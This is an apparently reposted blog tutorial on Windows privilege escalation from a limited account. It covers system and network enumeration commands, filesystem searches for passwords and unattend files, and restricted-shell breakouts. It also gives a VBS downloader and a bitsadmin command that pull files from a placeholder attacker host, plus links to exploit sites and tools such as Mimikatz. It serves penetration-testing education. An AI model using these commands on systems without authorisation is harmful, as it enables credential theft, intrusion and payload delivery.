BASIC WINDOWS PRIVILEGE ESCALATION
来源:互联网 发布:java分段函数是 编辑:程序博客网 时间:2024/06/05 17:16
https://thel3l.me/blog/winprivesc/index.html
Introduction-
This post is an attempt to get you started off on privilege escalation on Windows. It is by no means a comprehensive guide, but will attempt to cover all the major techniques in order to give you a base upon which you can build.
A list of extremely good resources is available at the bottom of this post.
Operating System-
Let's start the Privilege Escalation process with a Limited user account on the system. At this point, we have very little (or no) information on what the system's functionality is, who uses it and when it is idle, or which hosts it is connected to.
To identify the OS Name and Version:
C:\Users\thel3l> systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.14393 N/A Build 14393
Let's check the architecture of the system:
C:\Users\thel3l> echo %PROCESSOR_ARCHITECTURE%
AMD64NOTE: If the system is 32-bit, the above command will return "x86" and for 64-bit systems, it will return "AMD64"
View all environment variables:
C:\Users\thel3l> SET
USERNAME=thel3l
USERPROFILE=C:\Users\thel3l
*snip*View list of all users on the computer:
C:\Users\thel3l> net user #
User accounts for \\DESKTOP-U0MZPAO
-------------------------------------------------------------------------------
*snip*
The command completed successfully.
Or view more information about a user:
C:\Users\thel3l>net user thel3l #
User name thel3l
*snip*
The command completed successfully.
Networking-
Let's take a look at the networking setup of the system - the basic network, routing, the firewall etc.
To view the available networking interfaces:
C:\Users\thel3l> ipconfig /all #To view the routing table:
C:\Users\thel3l> route print #To view the ARP cache:
C:\Users\thel3l> arp -A #To view the firewall rules:
C:\Users\thel3l> netstat -ano #
C:\Users\thel3l> netsh firewall show config #
C:\Users\thel3l> netsh firewall show state #Applications and services-
Let's take a look at the running services and applications, their versions patch levels:
To view the scheduled tasks on a system:
C:\Users\thel3l> schtasks /QUERY /fo LIST /v #To view the Process IDs of services:
C:\Users\thel3l> tasklist /SVC #To view a list of installed drivers:
C:\Users\thel3l> DRIVERQUERY #A lot of valuable information can be obtained from WMIC or the Windows Management Instrumentation Command-line. It is extemely useful and allows you to perform a range of operations - from obtaining data to program uninstallation.
To view a list of installed programs with their versions (more vulnerabilities, hint, hint.):
C:\Users\thel3l> wmic product list brief #Similarly, to view a list of services, processes or startup programs:
C:\Users\thel3l> wmic service list brief # Lists services
C:\Users\thel3l> wmic process list brief # Lists processes
C:\Users\thel3l> wmic startup list brief # Lists startup itemsCheck if Microsoft Executables (.msi) can be executed as unprivileged users
C:\Users\thel3l> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
C:\Users\thel3l> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedNote: If you get 'The system was unable to find the specified registry key or value', it generally means that this setting was never set.
Check if setuid or setgid were ever set
C:\Users\thel3l> reg query HKEY_Local_Machine\System\CurrentControlSet\Services\NfsSvr\Parameters\SafeSetUidGidBits # This will only work on Windows Servers. A value of '0' indicates UNIX-environment like behaviour.
Check installed updates and date of installations:
C:\Users\thel3l> wmic qfe get Caption,Description,HotFixID,InstalledOn #Alternatively search for specific vulnerabilities that you can use to elevate privileges:
C:\Users\thel3l> wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KBxxxxxxx" # Replace with a patch version that you are searching for. Eg - KB3189031If you receive no output from the above command, it means that that particular patch wan't installed.
Sensitive data and directories-
Check for unencrypted passwords, or juicy files with sensitive info:
C:\Users\thel3l> cd/ #
C:\Users\thel3l> dir /b/s password.txt # Will search for all password.txt files on the filesystem.
C:\Users\thel3l> dir /b/s config.* # Will search for all files starting with 'config' on the filesystem.
C:\Users\thel3l> findstr /si password *.xml *.ini *.txt #
C:\Users\thel3l> findstr /si login *.xml *.ini *.txt #In addition to this, you can also check for unattended installation log files. These files generally contain passwords encoded in base64. You're more likely to find these files in large enterprises, where manual installation of individual systems is impractical. The common locations of these files are:
C:\sysprep.inf
C:\sysprep\sysprep.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattended.xmlFile systems-
Taking a look at what kind of access we have, what directories are accessible, what permissions are set on files.
Using pre-installed languages to break out of restrictive shells.
import os; os.system("cmd /c {command here}") # PythonOr maybe launch an FTP session, and execute commands from within it?
C:\Users\thel3l> copy con ftp.bat # Will allow you to edit a file called ftp.bat
ftp # Enter the name of the program (ftp here), press CTRL+Z to finish editing, and hit return.
C:\Users\thel3l> ftp.bat # Executing the file.
ftp> # We are thrown into the ftp application. Now we can attempt to execute commands -
ftp> !{command} # e.g. - !dir or !ipconfigOr just make a VBS script:
C:\Users\thel3l> copy con commandExec.vbs # Will allow you to edit a file called commandExec.vbs
Call WScript.CreateObject("Wscript.Shell").Run("cmd /K {command}", 8, True) # Use your own command, press CTRL+Z to finish editing, and hit return.
C:\Users\thel3l> commandExec.vbs # Launch the script.To check which folders are writable.
C:\Users\thel3l> dir /a-r-d /s /bExploiting the system, useful scripts-
Armed with all this information, we can now begin the process of actually elevating our privileges:
A neat VBscript to allow us to upload files, courtesy of Igor:
' downloadfile.vbs
' Set your settings
strFileURL = "http://{YOUR_IP}/{FILE_NAME.EXT}"
strHDLocation = "c:\\{FILE_NAME.EXT}"
' Fetch the file
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0 'Set the stream position to the start
Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
This script is highly useful, and will run on any version of windows. To execute it, simply do:
C:\Users\thel3l> script.exe downloadfile.vbs # Replace the second file name with whatever you've saved the script as.If you know that the OS on the host's system is Windows 7 and above, simply use the bitsadmin utility:
C:\Users\thel3l> bitsadmin /transfer job_name /download /priority priority URL local\path\file # Syntax
C:\Users\thel3l> bitsadmin /transfer mydownloadjob /download /priority normal ^ http://{YOUR_IP}/{FILE_NAME.EXT} C:\Users\username\Downloads\{FILE_NAME.EXT}Searching for exploits and shellcode-
http://www.exploit-db.com
http://1337day.com
http://0day.today
http://www.securityfocus.com
http://seclists.org/fulldisclosure/
http://www.exploitsearch.net
http://www.securiteam.com
http://metasploit.com/modules/
http://securityreason.com
https://cxsecurity.com/exploit/
http://securitytracker.com/
Other excellent resources, scripts, toolkits and guides-
rmusser01's GitHub document to Post Exploitation on Windows
Tim Arneaud on Windows Privilege Escalation
An article on WMIC
Luke Jennings on Group Policy Hijacking Attacks
Toying with the Windows API
enaqx - Excellent curated collection of content
PowerShellMafia's PowerSploit
The SysInternals suite
Windows Credential Editor
Mimikatz - Credential Extraction
GDSSecurity's Windows Exploit Suggester
SpiderLab's Responder - A LLMNR, NBT-NS and MDNS poisoner
PowerShellEmpire's Empire - Pure PowerShell post-exploitation agent
rabbitstack's fibratus - A tool for exploration and tracing of the Windows kernel
- BASIC WINDOWS PRIVILEGE ESCALATION
- Basic Linux Privilege Escalation
- Basic Linux Privilege Escalation
- Basic Linux Privilege Escalation
- Microsoft Windows "keybd_event" Local Privilege Escalation Exploit
- MS Windows GDI Local Privilege Escalation Exploit
- [LPE]Windows Local Privilege Escalation MS14-058
- [LPE]Windows Local Privilege Escalation MS15-051
- [LPE]Windows Local Privilege Escalation MS16-135
- Microsoft Windows CSRSS Local Privilege Escalation Exploit (MS05-018)
- hwclock(8) SUID privilege escalation
- NetBSD mail.local Privilege Escalation
- Pentest - mysql udf privilege escalation
- Debian 'login' Local Privilege Escalation Vulnerability
- Linux Kernel 'fasync_helper()' Local Privilege Escalation Vulnerability
- Linux Kernel 'fasync_helper()' Local Privilege Escalation Vulnerability
- Privilege escalation vulnerabilities in Nagios XI installer
- Joomla! 1.6/1.7/2.5 Privilege Escalation Vulnerability
- 付费DDoS服务——18岁以色列黑客运营“vDos”网站被捕
- 【网络通信】http大全
- 在C++中子类继承和调用父类的构造函数方法
- Revit开发之框选过滤ISelectionFilter
- datatables edit 设置默认的语言
- BASIC WINDOWS PRIVILEGE ESCALATION
- JS两个数组比较,删除重复值(转)
- 第三周项目3-求集合并集
- HDU1128:Self Numbers
- Android中的线程池(一)
- Gitbook简易教程
- 【知识记录】分布式事务解决方案
- 动态规划-选学生
- Gitbook输出为静态网站并启动 (链接中有入门教程)
